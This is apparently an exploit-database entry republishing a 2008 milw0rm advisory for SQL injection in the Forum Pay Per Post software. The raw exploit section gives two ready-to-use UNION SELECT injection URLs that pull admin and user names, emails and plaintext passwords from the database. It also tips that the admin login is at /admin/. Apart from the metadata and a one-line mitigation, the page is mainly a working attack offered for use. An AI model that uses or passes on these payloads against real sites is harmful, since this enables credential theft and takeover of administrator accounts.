header-logo
Suggest Exploit
vendor:
Forum Pay Per Post
by:
t0pP8uZz & xprog
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Forum Pay Per Post
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Forum Pay Per Post SQL Injection Vulnerbilitys

A vulnerability exists in Forum Pay Per Post which allows an attacker to pull admin/user info from the database. The passwords are stored in plaintext and the admin login is at /admin/.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		    Forum Pay Per Post SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://alstrasoft.com/forum-pay-per-post-exchange.htm
DORK: N/A


DESCRIPTION: 
pull admin/user info from the database


EXPLOITS:
www.site.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(auser,0x3a,apass),7/**/FROM/**/admin/*
www.site.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(username,0x3a,uemail,0x3a,upass),7/**/FROM/**/users/*



NOTE/TIP: 
passwords are in plaintext.
admin login is at /admin/


GREETZ: milw0rm.com, h4ck-y0u.org !


--==+================================================================================+==--
--==+		    Forum Pay Per Post SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-01-21]